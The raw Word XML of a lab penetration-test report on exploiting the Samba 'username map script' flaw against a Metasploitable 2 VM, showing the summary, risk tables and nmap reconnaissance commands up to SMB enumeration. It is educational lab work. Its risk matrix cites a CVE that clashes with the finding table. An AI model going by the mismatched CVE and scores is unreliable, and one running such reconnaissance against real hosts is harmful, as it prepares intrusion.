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8B9B2" w14:textId="5C836A03" w:rsidR="00A777F9" w:rsidRDefault="00A777F9" w:rsidP="00A777F9">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Exploitation of </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Samba Username Map Script Remote Command Execution </w:t>
      </w:r>
      <w:r>
        <w:t>Using Nmap and Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB891C5" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRDefault="00A777F9" w:rsidP="00A777F9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Author:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Sudip Bastola</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BCFD92" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRDefault="00A777F9" w:rsidP="00A777F9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Target System: </w:t>
      </w:r>
      <w:r>
        <w:t>Metasploitble 2 Linux VM (192.168.83.131)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B589D10" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRDefault="00A777F9" w:rsidP="00A777F9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attacker Platform:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Kali Linux (192.168.83.129)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018E2C2F" w14:textId="29C84F16" w:rsidR="00A777F9" w:rsidRDefault="00A777F9" w:rsidP="00A777F9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Assessment Date:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> July 1</w:t>
      </w:r>
      <w:r>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t>, 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4EC4E2" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRDefault="00A777F9" w:rsidP="00A777F9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A3507D0" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRDefault="00A777F9" w:rsidP="00A777F9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26212B88" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRDefault="00A777F9" w:rsidP="00A777F9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="766C1D32" w14:textId="68F36AC0" w:rsidR="00A777F9" w:rsidRDefault="00A777F9" w:rsidP="00A777F9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>1.Executive Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7499A77C" w14:textId="39804150" w:rsidR="00A777F9" w:rsidRDefault="00A777F9" w:rsidP="00A777F9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Penetration testing of the target computer was performed within the controlled lab environment in order to find out the security status of the machine under test. As a result of the assessment, the Server Message Block (SMB) service that operates Samba was found vulnerable to the Username Map Script Command Execution attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7403009E" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRDefault="00A777F9" w:rsidP="00A777F9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E32F65D" w14:textId="45BB322A" w:rsidR="00A777F9" w:rsidRDefault="00A777F9" w:rsidP="00A777F9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>As a result of the attack, an attacker gains access to a remote command execution due to the presence of the vulnerability in Samba service configuration. The exploitation of the mentioned vulnerability was possible with the help of the Metasploit Framework.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BC6382" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRDefault="00A777F9" w:rsidP="00A777F9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53822EB9" w14:textId="5E9261BC" w:rsidR="00A777F9" w:rsidRPr="00A777F9" w:rsidRDefault="00A777F9" w:rsidP="00A777F9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A777F9">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Risk Summary Matrix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777F9" w:rsidRPr="00EC28B5" w14:paraId="265C9EE8" w14:textId="77777777" w:rsidTr="005216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12401A2" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRPr="00EC28B5" w:rsidRDefault="00A777F9" w:rsidP="005216D1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EC28B5">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Metric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0D5F917A" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRPr="00EC28B5" w:rsidRDefault="00A777F9" w:rsidP="005216D1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C28B5">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A777F9" w:rsidRPr="00EC28B5" w14:paraId="76A68CD1" w14:textId="77777777" w:rsidTr="005216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A48FCDA" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRPr="00EC28B5" w:rsidRDefault="00A777F9" w:rsidP="005216D1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EC28B5">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Max Risk Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D19177A" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRPr="00EC28B5" w:rsidRDefault="00A777F9" w:rsidP="005216D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28B5">
              <w:t>CRITICAL (10.0 / 10.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A777F9" w:rsidRPr="00EC28B5" w14:paraId="7F510FB9" w14:textId="77777777" w:rsidTr="005216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E752489" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRPr="00EC28B5" w:rsidRDefault="00A777F9" w:rsidP="005216D1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EC28B5">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Primary Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F078A4B" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRPr="00EC28B5" w:rsidRDefault="00A777F9" w:rsidP="005216D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FFC">
              <w:t>Unauthenticated Remote Code Execution (CVE-2011-2523)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A777F9" w:rsidRPr="00EC28B5" w14:paraId="3FF758D8" w14:textId="77777777" w:rsidTr="005216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3D51A0D" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRPr="00EC28B5" w:rsidRDefault="00A777F9" w:rsidP="005216D1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EC28B5">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>System Compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="015549A8" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRPr="00EC28B5" w:rsidRDefault="00A777F9" w:rsidP="005216D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FFC">
              <w:t>Complete Administrative Takeover (Root Access Acquired)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A777F9" w:rsidRPr="00EC28B5" w14:paraId="73CCA115" w14:textId="77777777" w:rsidTr="005216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F1833C2" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRPr="00EC28B5" w:rsidRDefault="00A777F9" w:rsidP="005216D1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EC28B5">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Data Confidentiality</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E865DE3" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRPr="00EC28B5" w:rsidRDefault="00A777F9" w:rsidP="005216D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FFC">
              <w:t>Severely Compromised — Full read access to filesystem and database parameters.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A777F9" w:rsidRPr="00EC28B5" w14:paraId="77704F29" w14:textId="77777777" w:rsidTr="005216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C4C97BF" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRPr="00EC28B5" w:rsidRDefault="00A777F9" w:rsidP="005216D1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EC28B5">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>System Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71662A43" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRPr="00EC28B5" w:rsidRDefault="00A777F9" w:rsidP="005216D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FFC">
              <w:t>Severely Compromised — Full write, modify, and delete access over binary files and system logs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="680A6079" w14:textId="77777777" w:rsidR="00A777F9" w:rsidRPr="00A777F9" w:rsidRDefault="00A777F9" w:rsidP="00A777F9">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10EEDAD0" w14:textId="13ED877E" w:rsidR="00A777F9" w:rsidRDefault="008A7E22" w:rsidP="008A7E22">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">2.Scope and Methodology </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B98D71" w14:textId="0936CB0A" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="008A7E22">
      <w:r>
        <w:t>The assessment followed a standard penetration testing methodology consisting of the following phases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E120078" w14:textId="3D666A9E" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="008A7E22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9E4E88" w14:textId="1216241F" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="008A7E22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Scanning and Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5116C2" w14:textId="2768E0EB" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="008A7E22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B368866" w14:textId="68070828" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="008A7E22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163C8DFC" w14:textId="4C85EA05" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="008A7E22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Post-Exploitation Validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4422661F" w14:textId="4A7D736F" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="008A7E22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Reporting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD5CC26" w14:textId="700A07C9" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="008A7E22">
      <w:r>
        <w:t>Tools used during the assessment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C65CA9" w14:textId="22037605" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="008A7E22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Nmap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B1359B8" w14:textId="783D8A03" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="008A7E22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>SMBClient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A8DF803" w14:textId="324192B2" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="008A7E22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Enum4linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E5E47D0" w14:textId="5E32F8A6" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="008A7E22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Metasploit Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35848D4E" w14:textId="33612228" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="008A7E22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23F78B03" w14:textId="77777777" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="008A7E22">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17B64FC5" w14:textId="10EE36A9" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="008A7E22">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>3.Technical Finding and Exploitation Phase</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0312BA4D" w14:textId="71EF6909" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="008A7E22">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Finding 01: Samba Username Map Script Remote Command Execution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A74AE61" w14:textId="77777777" w:rsidR="008A7E22" w:rsidRPr="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="008A7E22"/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A7E22" w14:paraId="3CB33F07" w14:textId="77777777" w:rsidTr="005216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1746CDE" w14:textId="77777777" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="005216D1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Vulnerability type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A8147FB" w14:textId="4A692B3B" w:rsidR="008A7E22" w:rsidRPr="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="005216D1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A7E22">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
              </w:rPr>
              <w:t>Remote Code Execution</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A7E22" w14:paraId="4047AD9B" w14:textId="77777777" w:rsidTr="005216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385B706" w14:textId="77777777" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="005216D1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>CVSS v3 Base Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7BCB45F4" w14:textId="77777777" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="005216D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9.8 Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A7E22" w14:paraId="18D954A8" w14:textId="77777777" w:rsidTr="005216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8DBF8D7" w14:textId="77777777" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="005216D1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>CVE ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49E6084D" w14:textId="710FC23E" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="005216D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CVE-20</w:t>
            </w:r>
            <w:r>
              <w:t>07</w:t>
            </w:r>
            <w:r>
              <w:t>-2</w:t>
            </w:r>
            <w:r>
              <w:t>447</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008A7E22" w14:paraId="57432E97" w14:textId="77777777" w:rsidTr="005216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4916CF9" w14:textId="77777777" w:rsidR="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="005216D1">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Access Vector</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4675" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3A0E7249" w14:textId="66FA98CD" w:rsidR="008A7E22" w:rsidRPr="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="005216D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7E22">
              <w:t>Remote</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="11ABBAF6" w14:textId="58337C20" w:rsidR="008A7E22" w:rsidRPr="008A7E22" w:rsidRDefault="008A7E22" w:rsidP="008A7E22">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2591A128" w14:textId="24B1E4C2" w:rsidR="000F1435" w:rsidRDefault="000F1435" w:rsidP="000F1435">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006A7642">
        <w:t>Host Discovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE8EE24" w14:textId="2B6DC07D" w:rsidR="006A7642" w:rsidRPr="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Objective : Identify active hosts on the network</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616E88DF" w14:textId="09949562" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>Command: nmap -sn &lt;victim ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D08FA88" w14:textId="256020F7" w:rsidR="001841C2" w:rsidRDefault="001841C2" w:rsidP="006A7642">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="001841C2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17950FD0" wp14:editId="4C8C697E">
            <wp:extent cx="4934204" cy="2438525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="126131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17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49FB" w14:textId="0F55C7AF" w:rsidR="001841C2" w:rsidRDefault="001841C2" w:rsidP="001841C2">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FC924E" w14:textId="222B6167" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Port Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEB3A26" w14:textId="57267998" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Objective: Identify open tcp ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199FCB82" w14:textId="77777777" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A40F5B5" w14:textId="2D9570D2" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Command: nmap -T4 -F &lt;Victim ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38490C9B" w14:textId="40E44747" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Expected open ports include: 139/tcp (NetBIOS), 445/tcp(SMB)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441FD081" w14:textId="7F03545C" w:rsidR="001841C2" w:rsidRDefault="001841C2" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="001841C2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DC841F0" wp14:editId="4696590C">
            <wp:extent cx="5010407" cy="3391074"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="168120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06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33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9AB4" w14:textId="77777777" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23A84FE4" w14:textId="7B21FF34" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Service Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A8B567" w14:textId="5BB3A812" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Objective: Identify SMB service and version information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3949E2CA" w14:textId="77777777" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="066C836A" w14:textId="2582DDB3" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Command: nmap -sC -sV &lt;victim ip&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D701532" w14:textId="6B3B2D2E" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>The scan identified the Samba service running on the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199BFA41" w14:textId="010468CB" w:rsidR="001841C2" w:rsidRDefault="001841C2" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="001841C2">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2134EFFE" wp14:editId="5C619C31">
            <wp:extent cx="5571460" cy="3116089"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="171912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24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5451" cy="311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5A88" w14:textId="0B56E5FB" w:rsidR="001841C2" w:rsidRDefault="001841C2" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="001841C2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1FC196CB" wp14:editId="27D8BC9D">
            <wp:extent cx="5582093" cy="3026019"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="97291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11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6430" cy="30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7396" w14:textId="71A365C3" w:rsidR="001841C2" w:rsidRDefault="001841C2" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="001841C2">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2483D3A4" wp14:editId="3BC16208">
            <wp:extent cx="5656521" cy="1682452"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="155407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74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0193" cy="168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9DF0B" w14:textId="77777777" w:rsidR="001841C2" w:rsidRDefault="001841C2" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55C69BA9" w14:textId="2E9EAB0E" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SMB Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="771EF3A7" w14:textId="4968C300" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Objective: Enumerate available SMB shares and gather system information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5145A2C2" w14:textId="77777777" w:rsidR="006A7642" w:rsidRDefault="006A7642" w:rsidP="006A7642">
      <w:pPr>
